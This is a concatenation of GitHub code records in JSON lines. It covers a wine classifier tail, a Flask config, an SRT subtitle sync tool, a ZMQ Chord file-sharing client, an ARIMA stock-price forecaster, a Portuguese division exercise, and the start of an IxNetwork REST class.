LRfit()\n Accuracy=accuracy_score(y_test, y_pred)*100\n total_accuracy+=Accuracy\n n+=1\n MAC=total_accuracy/n\n print('K-Fold# =',n)\n #print(\"Confusion Matrix : \\n\",confusion_matrix(y_test, y_pred))\n print('Accuracy : {} \\t Average_Accuracy : {} '.format(Accuracy,MAC))\n \n \n \n#####################################################################################\n \n#Visualisation of the tree\nfrom sklearn import tree\ntree.plot_tree(dtc_gini) \n\n\nplt.subplot()\n","repo_name":"kchamarty/classification_wine","sub_path":"wine_classsification.py","file_name":"wine_classsification.py","file_ext":"py","file_size_in_byte":11156,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"27524918203","text":"import os\nfrom datetime import timedelta\n\nfrom dotenv import load_dotenv\n\nload_dotenv()\n\nimport tiktoken\n\nSECRET_KEY = os.getenv(\"SECRET_KEY\")\nSESSION_TYPE = \"filesystem\"\nSESSION_PERMANENT = True\nPERMANENT_SESSION_LIFETIME = timedelta(minutes=180)\n\nSESSION_COOKIE_SECURE = True\nSESSION_COOKIE_HTTPONLY = True\nSESSION_COOKIE_SAMESITE = \"Strict\"\nTEMPLATES_AUTO_RELOAD = True\n\nTOKENIZER = tiktoken.get_encoding(\"cl100k_base\")\nEMBEDDING_MODEL = \"text-embedding-ada-002\"\nGPT_MODEL = \"gpt-4-1106-preview\"\nMAIN_TEMP_DIR = \"app/main_user_directory\"\nMAX_LENGTH = 500\nTOP_N = 30\nBATCH_SIZE = 10\nALLOWED_EXTENSIONS = {\"txt\", \"pdf\", \"docx\"}\n\nCLEANUP_THRESHOLD_SECONDS = 3600\nSUPPORTED_FORMATS = (\".mp3\", \".mp4\", \".mpeg\", \".mpga\", \".m4a\", \".wav\", \".webm\")\nMAX_CONTENT_LENGTH = 50 * 1024 * 1024 # 50MB\nINITIAL_PROMPT = \"Hello, welcome to my lecture.\"\nMAX_FILE_SIZE = 100 * 1024 * 1024\nMAX_AUDIO_FILE_SIZE = 25 * 1024 * 1024\n","repo_name":"rawcsav/AIUtilsFlask","sub_path":"app/config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":911,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"20586733012","text":"#! python3\r\n# srt_sync.py\r\n\r\n'''\r\nTO DO:\r\n\r\n- Raise exceptions for invalid slice arguments\r\n\t- Raise exception if index parameter is out of range\r\n\t- Raise exception if start index >= end index\r\n- Fix negative offset (related to optional arguments)\r\n- Match the last line of the file(?)\r\n- Merge / Split / Delete methods\r\n- Check overlaps / negative duration / short display time / long lines\r\n'''\r\n\r\n# imports ======================================================================\r\n\r\nfrom collections import namedtuple\r\nimport argparse\r\nimport logging\r\nimport os\r\nimport re\r\nimport sys\r\n\r\n\r\n# logging definitions ==========================================================\r\n\r\nlogging.basicConfig(level=logging.DEBUG, format='%(levelname)s: %(message)s')\r\n#logging.disable(logging.DEBUG)\r\n\r\n\r\n# constants ====================================================================\r\n\r\nConstants = namedtuple('Constants', ['SRT_PATTERN', 'TIMESTAMP_PATTERN'])\r\nconstants = Constants(\r\n\r\n\t# SRT_PATTERN --------------------------------------------------------------\r\n\tr'''\t\t\t\t\t\t\t\t# https://regex101.com/r/eSrmb9/6\r\n\t(\\d+)[\\r]?[\\n]\t\t\t\t\t\t# index\r\n\t(\\d\\d):(\\d\\d):(\\d\\d),(\\d\\d\\d)\t\t# starting hour, mins, secs, msecs\r\n\t[ ]-->[ ]\t\t\t\t\t\t\t# timestamp division\r\n\t(\\d\\d):(\\d\\d):(\\d\\d),(\\d\\d\\d)\t\t# ending hour, mins, secs, msecs\r\n\t(\t\t\t\t\t\t\t\t\t# optional positional coordinates\r\n\t\t[ ]{1,2}\r\n\t\tX1:(\\d{3})[ ]\t\t\t\t\t# X1 coordinate\r\n\t\tX2:(\\d{3})[ ]\t\t\t\t\t# X2 coordinate\r\n\t\tY1:(\\d{3})[ ]\t\t\t\t\t# Y1 coordinate\r\n\t\tY2:(\\d{3})\t\t\t\t\t\t# Y2 coordinate\r\n\t)?\r\n\t[\\r]?[\\n]\r\n\t(((.+)[\\r]?[\\n])+)\t\t\t\t\t# content\r\n\t''', \r\n\r\n\t# TIMESTAMP_PATTERN --------------------------------------------------------\r\n\tr'''\t\t\t\t\t\t\t\t# https://regex101.com/r/pexG8G/2\r\n\t^([+-])?\t\t\t\t\t\t\t# offset sign\r\n\t(\r\n\t\t(([0-5]?\\d):)?\t\t\t\t\t# hours\r\n\t\t(([0-5]?\\d):)\t\t\t\t\t# minutes\r\n\t)?\r\n\t([0-5]?\\d)\t\t\t\t\t\t\t# seconds\r\n\t([,](\\d\\d?\\d?))?$\t\t\t\t\t# msecs\r\n\t'''\r\n)\r\n\r\n\r\n# classes ======================================================================\r\n\r\nclass Movie():\r\n\r\n\tdef __init__(self, srt_path):\r\n\t\tif not os.path.exists(srt_path):\r\n\t\t\traise FileNotFoundError('SRT file could not be found.')\r\n\t\tif not (os.path.isfile(srt_path) and srt_path.lower().endswith('.srt')):\r\n\t\t\traise TypeError('The file is not a valid SRT subtitle.')\r\n\r\n\t\tsrt_file = open(srt_path, 'r')\r\n\t\tsrt_content = srt_file.read()\r\n\t\tsrt_file.close()\r\n\r\n\t\tsrt_ro = re.compile(constants.SRT_PATTERN, re.VERBOSE)\r\n\t\tsrt_match = srt_ro.findall(srt_content)\r\n\t\tif not srt_match:\r\n\t\t\traise ValueError('No subtitles to load.')\r\n\t\t\r\n\t\tself.subtitles = []\r\n\t\tfor sub in srt_match:\r\n\t\t\ti = int(sub[0])\r\n\t\t\th0 = int(sub[1])\r\n\t\t\tm0 = int(sub[2])\r\n\t\t\ts0 = int(sub[3])\r\n\t\t\tms0 = int(sub[4])\r\n\t\t\th1 = int(sub[5])\r\n\t\t\tm1 = int(sub[6])\r\n\t\t\ts1 = int(sub[7])\r\n\t\t\tms1 = int(sub[8])\r\n\t\t\tif sub[9] == '':\r\n\t\t\t\tpos = None\r\n\t\t\telse:\r\n\t\t\t\tpos = ( \r\n\t\t\t\t\tint(sub[10]), \r\n\t\t\t\t\tint(sub[11]), \r\n\t\t\t\t\tint(sub[12]), \r\n\t\t\t\t\tint(sub[13])\r\n\t\t\t\t)\r\n\t\t\tcontent = sub[14].strip('\\r\\n').replace('\\r', '').split('\\n')\r\n\t\t\tself.subtitles.append(Subtitle(\r\n\t\t\t\ti, \r\n\t\t\t\t((h0 * 3600) + (m0 * 60) + (s0)) * 1000 + ms0, \r\n\t\t\t\t((h1 * 3600) + (m1 * 60) + (s1)) * 1000 + ms1, \r\n\t\t\t\tpos, \r\n\t\t\t\tcontent\r\n\t\t\t))\r\n\r\n\r\n\tdef offset_subtitles(self, offset_timestamp, first_index=1, last_index=None):\r\n\t\toffset_msecs = timestamp_to_millisecs(offset_timestamp)\r\n\t\tfor sub in self.subtitles[first_index-1:last_index]:\r\n\t\t\ttime_start = sub.time_start + offset_msecs\r\n\t\t\ttime_end = sub.time_end + offset_msecs\r\n\t\t\tif (time_start < 0) or (time_end < 0):\r\n\t\t\t\traise ValueError('Subtitle timestamp can not be negative.')\r\n\t\t\telse:\r\n\t\t\t\tsub.time_start = time_start\r\n\t\t\t\tsub.time_end = time_end\r\n\r\n\r\n\tdef scale_subtitles(self, scale_factor, first_index=1, last_index=None):\r\n\t\tif type(scale_factor) != float:\r\n\t\t\traise TypeError('Scale factor needs to be a float value.')\r\n\t\tfor sub in self.subtitles[first_index-1:last_index]:\r\n\t\t\ttime_start = int(sub.time_start * scale_factor)\r\n\t\t\ttime_end = int(sub.time_end * scale_factor)\r\n\t\t\tif (time_start < 0) or (time_end < 0):\r\n\t\t\t\traise ValueError('Subtitle timestamp can not be negative.')\r\n\t\t\telse:\r\n\t\t\t\tsub.time_start = time_start\r\n\t\t\t\tsub.time_end = time_end\r\n\r\n\r\n\tdef interpolate_subtitles(self, first_timestamp, last_timestamp, first_index=1, last_index=None):\r\n\t\tfirst_time_original = self.subtitles[first_index-1].time_start\r\n\t\tif last_index:\r\n\t\t\tlast_time_original = self.subtitles[last_index].time_start\r\n\t\telse:\r\n\t\t\tlast_time_original = self.subtitles[-1].time_start\r\n\t\tfirst_time_sync = timestamp_to_millisecs(first_timestamp)\r\n\t\tlast_time_sync = timestamp_to_millisecs(last_timestamp)\r\n\t\t\r\n\t\tif (first_time_sync < 0) or (last_time_sync < 0):\r\n\t\t\traise ValueError('Subtitle timestamp can not be negative.')\r\n\t\t\r\n\t\tif first_time_sync >= last_time_sync:\r\n\t\t\traise ValueError('The last timestamp has to be higher than the first timestamp.')\r\n\t\t\t\r\n\t\tfor sub in self.subtitles[first_index-1:last_index]:\r\n\t\t\tsub.time_start = int(linear_interpolation(\r\n\t\t\t\tfirst_time_original, \r\n\t\t\t\tlast_time_original, \r\n\t\t\t\tfirst_time_sync, \r\n\t\t\t\tlast_time_sync, \r\n\t\t\t\tsub.time_start\r\n\t\t\t))\r\n\r\n\t\t\tsub.time_end = int(linear_interpolation(\r\n\t\t\t\tfirst_time_original, \r\n\t\t\t\tlast_time_original, \r\n\t\t\t\tfirst_time_sync, \r\n\t\t\t\tlast_time_sync, \r\n\t\t\t\tsub.time_end\r\n\t\t\t))\r\n\r\n\r\n\tdef get_srt_syntax(self):\r\n\t\tsrt_string = ''\r\n\t\tfor sub in self.subtitles:\r\n\t\t\tsrt_string += sub.get_srt_syntax()\r\n\t\t\r\n\t\tassert len(re.compile(constants.SRT_PATTERN, re.VERBOSE).findall(srt_string)) == len(self.subtitles), 'Invalid srt syntax output.'\r\n\r\n\t\treturn srt_string\r\n\r\n\r\nclass Subtitle():\r\n\r\n\tdef __init__(self, index, time_start, time_end, position, content):\r\n\t\tself.index = index\r\n\t\tself.time_start = time_start\r\n\t\tself.time_end = time_end\r\n\t\tself.position = position\r\n\t\tself.content = content\r\n\r\n\r\n\tdef get_timestamp_str(self, timestamp):\r\n\t\t\tif timestamp == 'start':\r\n\t\t\t\tms = self.time_start\r\n\t\t\telif timestamp == 'end':\r\n\t\t\t\tms = self.time_end\r\n\t\t\telse:\r\n\t\t\t\traise ValueError('Invalid parameter: \\'{}\\''.format(timestamp))\r\n\t\t\treturn millisecs_to_timestamp(ms)\r\n\r\n\r\n\tdef get_position_str(self):\r\n\t\tif self.position:\r\n\t\t\treturn ' X1:{:0>3d}'.format(self.position[0]) + \\\r\n\t\t\t\t ' X2:{:0>3d}'.format(self.position[1]) + \\\r\n\t\t\t\t ' Y1:{:0>3d}'.format(self.position[2]) + \\\r\n\t\t\t\t ' Y2:{:0>3d}'.format(self.position[3])\r\n\t\telse:\r\n\t\t\treturn ''\r\n\r\n\r\n\tdef get_srt_syntax(self):\r\n\t\tsrt_string = '{}\\n'.format(self.index) + \\\r\n\t\t\t\t\t '{} --> {}'.format(self.get_timestamp_str('start'), self.get_timestamp_str('end')) + \\\r\n\t\t\t\t\t '{}\\n'.format(self.get_position_str()) + \\\r\n\t\t\t\t\t '{}\\n\\n'.format('\\n'.join(self.content))\r\n\t\t\r\n\t\treturn srt_string\r\n\r\n\r\n# functions ====================================================================\r\n\r\ndef timestamp_to_millisecs(timestamp):\r\n\ttimestamp_ro = re.compile(constants.TIMESTAMP_PATTERN, re.VERBOSE)\r\n\r\n\tmatch = timestamp_ro.search(timestamp)\r\n\t\r\n\tif match == None:\r\n\t\traise ValueError('Incorrect offset syntax: [+/-]HH:MM:SS,MSC')\r\n\r\n\tif match.group(1) == '-':\r\n\t\tsign = -1\r\n\telse:\r\n\t\tsign = 1\r\n\t\r\n\tif match.group(4):\r\n\t\th = int(match.group(4))\r\n\telse:\r\n\t\th = 0\r\n\r\n\tif match.group(6):\r\n\t\tm = int(match.group(6))\r\n\telse:\r\n\t\tm = 0\r\n\r\n\tif match.group(7):\r\n\t\ts = int(match.group(7))\r\n\telse:\r\n\t\ts = 0\r\n\t\r\n\tif match.group(9):\r\n\t\tms = int(match.group(9)) * (10 ** (3 - len(match.group(9))))\r\n\telse:\r\n\t\tms = 0\r\n\r\n\treturn (((h * 3600) + (m * 60) + (s)) * 1000 + ms) * sign\r\n\r\n\r\ndef millisecs_to_timestamp(ms):\r\n\tif type(ms) != int:\r\n\t\traise TypeError('\\'ms\\' parameter must be a positive int.')\r\n\tif ms < 0:\r\n\t\traise ValueError('\\'ms\\' parameter must be a positive int.')\r\n\t\t\r\n\th = ms // 3600000 % 24\r\n\tm = ms // 60000 % 60\r\n\ts = ms // 1000 % 60\r\n\tms = ms % 1000\r\n\t\r\n\treturn '{:0>2d}:{:0>2d}:{:0>2d},{:0>3d}'.format(h, m, s, ms)\r\n\r\n\r\ndef linear_interpolation(xMin, xMax, yMin, yMax, x):\r\n\treturn (((x - xMin) * (yMax - yMin)) / (xMax - xMin)) + yMin\r\n\r\n\r\n# main =========================================================================\r\n\r\ndef main():\r\n\r\n\t# Argument parser\r\n\tparser = argparse.ArgumentParser(prog='srt_sync', description='srt_sync: Python module for syncing .srt format subtitles.')\r\n\tparser.add_argument('filepath', type=str, help='Path to the \\'.srt\\' subtitle file.')\r\n\tparser.add_argument('-first_index', type=int, default=1, help='Index of the first subtitle to synchronize.')\r\n\tparser.add_argument('-last_index', type=int, default=None, help='Index of the last subtitle to synchronize.')\r\n\t\r\n\tsubparsers = parser.add_subparsers(help='Available Commands.', dest='command', required=True)\r\n\r\n\tparser_offset = subparsers.add_parser('offset')\r\n\tparser_offset.add_argument('offset_timestamp', type=str, help='Offset timestamp for all subtitles.')\r\n\t\r\n\tparser_offset = subparsers.add_parser('scale')\r\n\tparser_offset.add_argument('scale_factor', type=float, help='Scale factor for all subtitles.')\r\n\r\n\tparser_interpolate = subparsers.add_parser('interpolate')\r\n\tparser_interpolate.add_argument('first_timestamp', type=str, help='New timestamp for the first subtitle.')\r\n\tparser_interpolate.add_argument('last_timestamp', type=str, help='New timestamp for the last subtitle.')\r\n\r\n\targs = parser.parse_args()\r\n\tlogging.debug(args)\r\n\t\r\n\ttry:\r\n\t\t# Load movie\r\n\t\tmovie = Movie(args.filepath)\r\n\r\n\t\t# Offset movie\r\n\t\tif args.command == 'offset':\r\n\t\t\tmovie.offset_subtitles(args.offset_timestamp, args.first_index, args.last_index)\r\n\r\n\t\t# Scale movie\r\n\t\telif args.command == 'scale':\r\n\t\t\tmovie.scale_subtitles(args.scale_factor, args.first_index, args.last_index)\r\n\r\n\t\t# Interpolate movie\r\n\t\telif args.command == 'interpolate':\r\n\t\t\tmovie.interpolate_subtitles(args.first_timestamp, args.last_timestamp, args.first_index, args.last_index)\r\n\r\n\t\t# Get SRT syntax for the synced subtitles\r\n\t\tmovie_srt_syntax = movie.get_srt_syntax()\r\n\t\r\n\texcept Exception as err:\r\n\t\tprint('Error: ' + str(err))\r\n\t\tsys.exit()\r\n\r\n\t# Save synced file\r\n\tsynced_file = open(args.filepath, 'w')\r\n\tsynced_file.write(movie_srt_syntax)\r\n\tsynced_file.close()\r\n\t\r\n\r\nif __name__ == '__main__':\r\n\tmain()\r\n","repo_name":"dariusdan/srt_sync","sub_path":"srt_sync.py","file_name":"srt_sync.py","file_ext":"py","file_size_in_byte":9990,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"70523413650","text":"import zmq\nimport hashlib \nimport sys\nimport os\n\nPS = 1024 * 1024\n\n# Encode and Decode data\nclass Code:\n\tdef __init__(self,f):\n\t\tself.format = f\n\tdef deco(self, data):\n\t\treturn data.decode(self.format)\n\tdef enco(self, data):\n\t\treturn data.encode(self.format)\n\n# Get sha hash \nclass Sha:\n\tdef __init__(self, v):\n\t\tself.version = v\n\tdef getHash(self, file):\n\t\tif (self.version == '1'):\n\t\t\treturn hashlib.sha1(file).hexdigest()\n\t\tif (self.version == '256'):\n\t\t\treturn hashlib.sha256(file).hexdigest()\n\n\nclass Chord_Client:\n\tdef __init__(self):\n\t\tself.context = zmq.Context()\n\t\t#Utilidades\n\t\tself.coder = Code('ascii')\n\t\tself.hasher = Sha(256)\n\n\tdef run(self):\n\t\t\n\t\ttry:\n\t\t\tcommand = sys.argv[1]\n\t\texcept:\n\t\t\tprint('You must use an action: upload or download')\n\n\t\tif command == 'state':\n\t\t\tself.state(sys.argv[2])\n\t\telif command == 'upload':\n\t\t\tself.upload(sys.argv[2], sys.argv[3])\n\t\telif command == 'download':\n\t\t\tself.download(sys.argv[2], sys.argv[3])\n\n\tdef send_request(self, req, address, send='multipart', recv='multipart'):\n\t\tsocket = self.context.socket(zmq.REQ)\n\t\tsocket.connect(\"tcp://\"+address)\n\n\t\tif(send=='multipart'):\n\t\t\tsocket.send_multipart(req)\n\t\telif(send=='json'):\n\t\t\tsocket.send_json(req)\n\n\t\tif(recv=='multipart'):\n\t\t\tres = socket.recv_multipart()\n\t\telif(recv=='json'):\n\t\t\tres = socket.recv_json()\n\n\t\tsocket.close()\n\t\treturn res\n\n\tdef upload_segment(self,name_file, segment, server_address, chord_file = False):\n\t\tname_segment = hashlib.sha1(segment).hexdigest()\n\t\t#print(name_segment, type(name_segment))\n\t\tif chord_file:\n\t\t\trequest = [b'upload chord file',self.coder.enco(name_segment),segment]\n\t\telse:\n\t\t\trequest = [b'upload',self.coder.enco(name_segment),segment]\n\n\t\taddress = server_address\n\t\twhile True:\n\t\t\tresponse = self.send_request(request,address)\n\t\t\tif self.coder.deco(response[0]) == 'success upload':\n\t\t\t\tprint(\"Segment was upload: {} on server {}\".format(name_segment,address))\n\t\t\t\treturn True\n\t\t\telif self.coder.deco(response[0]) == 'chord file exist':\n\t\t\t\treturn False\n\t\t\telse:\n\t\t\t\taddress = self.coder.deco(response[1])\n\t\t\t\tif address == server_address:\n\t\t\t\t\treturn False\n\n\tdef finish_chord_file(self, name_file, complete_hash):\n\t\tf = open(name_file+\".chord\", \"r\")\n\t\tlines = f.readlines()\n\t\tlines.insert(0,complete_hash+'\\n')\n\t\tlines.insert(0,name_file+'\\n')\n\t\tf.close()\n\t\tf = open(name_file+\".chord\", \"w\")\n\t\tf.writelines(lines)\n\t\tf.close()\n\n\tdef upload_chord_file(self, name_file, server_address):\n\t\twith open(name_file, 'rb') as f:\n\t\t\tchord_data = f.read()\n\t\t\thash_chord_file = hashlib.sha1(chord_data).hexdigest()\n\t\t\tres = self.upload_segment(hash_chord_file,chord_data,server_address, chord_file=True)\n\t\t\tif res:\n\t\t\t\tprint('Magnet link is already!: '+ hash_chord_file)\n\t\t\t\treturn hash_chord_file\t\t\t\n\t\t\telse:\n\t\t\t\tprint('The file already exist en chord, you can use this magnet link to donwload: '+ hash_chord_file)\n\t\t\t\treturn ''\n\n\tdef upload_file(self, name_file, server_address):\n\t\twith open(name_file, 'rb') as f:\n\t\t\twhile True:\n\t\t\t\tsegment = f.read(PS)\n\t\t\t\tif not segment:\n\t\t\t\t\tbreak\n\t\t\t\tres = self.upload_segment(name_file,segment, server_address)\n\t\t\t\tif not res:\n\t\t\t\t\tprint(\"The upload was canceled\")\n\t\t\t\t\tbreak\n\t\t\t\t\n\tdef upload(self, name_file, server_address):\n\t\tself.clear_file(name_file+\".chord\")\n\t\tf = open(name_file, 'rb')\n\t\tcf = open(name_file+\".chord\", \"a\")\n\t\tsha1 = hashlib.sha1()\n\t\twhile True:\n\t\t\tsegment = f.read(PS)\n\t\t\tif not segment:\n\t\t\t\tcf.close()\n\t\t\t\tf.close()\n\t\t\t\tself.finish_chord_file(name_file,\tsha1.hexdigest())\n\t\t\t\tres = self.upload_chord_file(name_file+\".chord\",server_address)\n\t\t\t\tif res:\n\t\t\t\t\tself.upload_file(name_file, server_address)\n\t\t\t\t\tprint(\"The file was upload! The magnet link is: \"+ res)\n\t\t\t\tbreak\n\t\t\tname_segment = hashlib.sha1(segment).hexdigest()\n\t\t\tcf.write(name_segment+\"\\n\")\n\t\t\tsha1.update(segment)\n\n\tdef download_segment(self,name_file,name_segment,server_address):\n\t\trequest = [b'download',self.coder.enco(name_segment)]\n\t\taddress = server_address\n\t\twhile True:\n\t\t\tresponse = self.send_request(request,address)\n\t\t\tif self.coder.deco(response[0]) == 'success download':\n\t\t\t\twith open(name_file, 'ab') as f:\n\t\t\t\t\tf.write(response[1])\n\t\t\t\treturn True\n\t\t\telif self.coder.deco(response[0]) == 'file not found error':\n\t\t\t\tprint(\"Segment not found!\")\n\t\t\t\treturn False\n\t\t\telse:\n\t\t\t\taddress = self.coder.deco(response[1])\n\t\t\t\tif address == server_address:\n\t\t\t\t\tprint(\"Hash out of limits!\")\n\t\t\t\t\treturn False\n\n\tdef clear_file(self,name_file):\n\t\tf = open(name_file, 'w')\n\t\tf.write('')\n\t\tf.close()\n\n\tdef download(self,chord_file, server_address):\n\t\tif '.chord' in chord_file:\n\t\t\twith open(chord_file, 'r') as f:\n\t\t\t\tlines = f.readlines()\n\t\t\t\tname_file = lines.pop(0)[:-1]\n\t\t\t\tcomplete_hash = lines.pop(0)[:-1]\n\t\t\t\tcont = 0\n\t\t\t\tself.clear_file(name_file)\n\t\t\t\tfor name_segment in lines:\n\t\t\t\t\tname_segment = name_segment[:-1]\n\t\t\t\t\tprint(cont, name_segment)\n\t\t\t\t\tcont += 1\n\t\t\t\t\tres = self.download_segment(name_file,name_segment,server_address)\n\t\t\t\t\tif not res:\n\t\t\t\t\t\tprint('Donwload was canceled, an error has occurred')\n\t\t\t\t\t\tbreak\n\t\t\t\tself.check_integrity(complete_hash, name_file)\n\t\t\t\tprint('Donwload finished!')\n\t\telse:\n\t\t\tif len(chord_file) == 40:\n\t\t\t\tprint(\"Downloading with magnet link!\")\n\t\t\t\tres = self.download_segment('temp.chord',chord_file,server_address)\n\t\t\t\tif not res:\n\t\t\t\t\tprint(\"Magnet link invalid!\")\n\t\t\t\telse:\n\t\t\t\t\tself.download('temp.chord',server_address)\n\t\t\t\t\tos.remove('temp.chord')\n\t\t\telse:\n\t\t\t\tprint(\"Cord file or magnet link invalid\")\n\n\tdef check_integrity(self,complete_hash, name_file):\n\t\twith open(name_file, \"rb\") as f:\n\t\t\tsha1 = hashlib.sha1()\n\t\t\twhile True:\n\t\t\t\tsegment = f.read(PS)\n\t\t\t\tif not segment:\n\t\t\t\t\tif sha1.hexdigest() == complete_hash:\n\t\t\t\t\t\tprint(\"Succefully download: \\nHash registered:\\t{}\\nHash download:\\t{}\".format(complete_hash,sha1.hexdigest()))\n\t\t\t\t\telse:\n\t\t\t\t\t\tprint(\"Failure download: File corrupted!\")\n\t\t\t\t\tbreak\n\t\t\t\tsha1.update(segment)\n\n\tdef state(self, address):\n\t\trequest = [b'state']\n\t\tintial_address = address\n\t\tcurrent_address = address\n\t\twhile(True):\n\t\t\tresponse = self.send_request(request,current_address,recv='json')\n\t\t\tprint(\"Chord State--------->\")\n\t\t\tprint(\"Name: \"+response['name'])\n\t\t\tprint(\"Address: \"+response['address'])\n\t\t\tprint(\"Lim: \"+', '.join(list(map(str,response['lim']))))\n\t\t\tprint(\"Successor: \"+response['successor'])\n\t\t\tprint(\"Predecessor: \"+response['predecessor'])\n\t\t\tprint(\"-------------------->\")\n\t\t\tcurrent_address = response['successor']\n\t\t\tif(intial_address == current_address):\n\t\t\t\tbreak\n\nif __name__ == \"__main__\":\n\tclient = Chord_Client()\n\tclient.run()","repo_name":"HectorMontillo/Servidor-de-Archivos-PyZmq","sub_path":"clientfolder/client.py","file_name":"client.py","file_ext":"py","file_size_in_byte":6515,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"70231099092","text":"import itertools\nimport numpy as np\nimport pandas as pd\nimport yfinance as yf\nfrom statsmodels.tsa.arima_model import ARIMA\nfrom sklearn.metrics import mean_squared_error\nimport warnings\nwarnings.filterwarnings(\"ignore\")\n\nclass Time_Series:\n \n def __init__(self) -> None:\n pass\n \n def get_data(self, ticker_symbol):\n \"\"\"This function is for loading the 7-day of stock price by minute\n \n Parameters\n ----------\n ticker_symbol : str\n the ticker symbol from a specific company\n \n Returns\n -------\n pandas dataframe\n a dataframe contains stock price\n \"\"\"\n try:\n \n # get stock price:\n data = yf.download(tickers = ticker_symbol, period = \"7d\", interval = \"1m\", \n progress = False\n )\n # print out the latest timestamp of the data:\n print(f\"The last timestamp of the data (New York timezone): {data.index[-1].strftime('%Y-%m-%d %H:%M:%S')}\")\n \n self.data = data\n return self.data\n \n except Exception as err:\n print(err) \n \n def split(self):\n \"\"\"This function is for train & test split for time series data\n\n Returns\n -------\n series\n train & test series\n \"\"\"\n try:\n train = self.data[['Open']].iloc[:-50]\n test = self.data[['Open']].iloc[-50:]\n \n self.train = train\n self.test = test\n \n return self.train, self.test\n \n except Exception as err:\n print(err)\n \n def make_log(self):\n \"\"\"This function is for taking log1p transform on stock price.\n\n Returns\n -------\n train_1, test_1\n the train & test after taking log1p transform\n \"\"\"\n try:\n train_1 = np.log1p(self.train)\n test_1 = np.log1p(self.test)\n \n self.train_1 = train_1\n self.test_1 = test_1\n\n return self.train_1, self.test_1\n \n except Exception as err:\n print(err) \n\n def generate_params(self):\n \"\"\"This function is for generating P, D, Q permutation for ARIMA model.\n\n Returns\n -------\n params, list\n a list of each P, D, Q combination\n \"\"\"\n try:\n p = range(1, 7)\n d = range(1, 3)\n q = range(3)\n params = list(itertools.product(p, d, q))\n \n self.params = params\n \n return self.params\n \n except Exception as err:\n print(err) \n \n def training(self, i, xtrain, xtest):\n \"\"\"This function is for ARIMA model training.\n\n Parameters\n ----------\n i : tuple\n the (P, D, Q) combination\n xtrain : pandas series\n the training series \n xtest : pandas series\n the test series\n\n Returns\n -------\n prediction, list\n a list of prediction\n \"\"\"\n try:\n prediction = []\n \n for j in range(len(xtest)):\n try:\n model = ARIMA(xtrain, order = i).fit()\n pred = model.forecast()[0]\n prediction.append(pred)\n xtrain = xtrain.append(pd.Series(xtest.iloc[j]), ignore_index = True)\n \n except:\n prediction.append(np.nan)\n \n return prediction\n \n except Exception as err:\n print(err) \n \n def rmse_calculation(self):\n \"\"\"This function is for ARIMA model training & get a list of RMSE of each\n permutation of (P, D, Q)\n\n Returns\n -------\n rmse_box, list\n a list of RMSE from ARIMA model training with each (P, D, Q) permutation\n best_pdq, tuple\n a tuple of the best (P, D, Q)\n \"\"\"\n try:\n rmse_box = []\n for i in self.params[:1]:\n try:\n train_2 = self.train_1.copy()\n prediction = self.training(i, train_2, self.test_1)\n rmse = np.sqrt(\n mean_squared_error(np.expm1(self.test_1), np.expm1(prediction))\n )\n rmse_box.append(rmse)\n # print(f\"(P, D, Q): {i}, RMSE: {rmse}\")\n except:\n rmse_box.append(np.nan)\n # print(f\"(P, D, Q): {i}, RMSE: nan\")\n \n best_pdq = self.params[rmse_box.index(min(rmse_box))]\n # print(f\"smallest RMSE: {min(rmse_box)}, \\\n # (P, D, Q) = {best_pdq}.\") \n \n self.rmse_box = rmse_box\n self.best_pdq = best_pdq\n \n return self.rmse_box, self.best_pdq\n \n except Exception as err:\n print(err) \n \n def final_training(self):\n \"\"\"This function is to get the final model and make a prediction for \n the next minute open price.\n\n Returns\n -------\n str\n a message to show the next minute open price\n \"\"\"\n try:\n final_model = ARIMA(self.data[['Open']], order = self.best_pdq).fit()\n pred = final_model.forecast()[0]\n next_open_price = float(np.round_(pred, 2))\n \n return f\"The open price will be ${next_open_price} in the next minute.\"\n \n except Exception as err:\n print(err) \n","repo_name":"bellepmshen/time_series_real_time_forecast","sub_path":"time_series.py","file_name":"time_series.py","file_ext":"py","file_size_in_byte":5748,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"35575929628","text":"def divisao():\n try:\n dividendo = int(input('Insira o dividendo: '))\n divisor = int(input('Insira o divisor: '))\n resultado = dividendo / divisor\n print(resultado)\n except ZeroDivisionError:\n print('Ops... Não é possível dividir por zero')\n return True\n except ValueError:\n print('Insira um NÚMERO')\n return True\n\n\nwhile divisao():\n divisao()\n","repo_name":"Lucas-GSS/study-notes","sub_path":"uninter/analise-e-desenvolvimento-de-sistemas/logica-de-programacao-e-algoritmos/aula-5-funcoes/tratamento_execessao.py","file_name":"tratamento_execessao.py","file_ext":"py","file_size_in_byte":415,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"11520851965","text":"import sys\nfrom ixnetwork_restpy.base import Base\nfrom ixnetwork_restpy.files import Files\n\nif sys.version_info >= (3, 5):\n from typing import List, Any, Union\n\n\nclass MulticastLeafRange(Base):\n \"\"\"Configures the multicast leaf range values.\n The MulticastLeafRange class encapsulates a list of multicastLeafRange resources that are managed by the user.\n A list of resources can be retrieved from the server using the MulticastLeafRange.find() method.\n The list can be managed by using the MulticastLeafRange.add() and MulticastLeafRange.remove() methods.\n \"\"\"\n\n __slots__ = ()\n _SDM_NAME = \"multicastLeafRange\"\n _SDM_ATT_MAP = {\n \"ContinuousIncrOpaqueValuesAcrossRoot\": \"continuousIncrOpaqueValuesAcrossRoot\",\n \"Enabled\": \"enabled\",\n \"LabelValueStart\": \"labelValueStart\",\n \"LabelValueStep\": \"labelValueStep\",\n \"LspCountPerRoot\": \"lspCountPerRoot\",\n \"LspType\": \"lspType\",\n \"RootAddrCount\": \"rootAddrCount\",\n \"RootAddrStep\": \"rootAddrStep\",\n \"RootAddress\": \"rootAddress\",\n }\n _SDM_ENUM_MAP = {\n \"lspType\": [\"p2mp\"],\n }\n\n def __init__(self, parent, list_op=False):\n super(MulticastLeafRange, self).__init__(parent, list_op)\n\n @property\n def GroupTrafficRange(self):\n \"\"\"\n Returns\n -------\n - obj(ixnetwork_restpy.testplatform.sessions.ixnetwork.vport.protocols.grouptrafficrange_592edfb5d660c2ef731fff853a50b1a6.GroupTrafficRange): An instance of the GroupTrafficRange 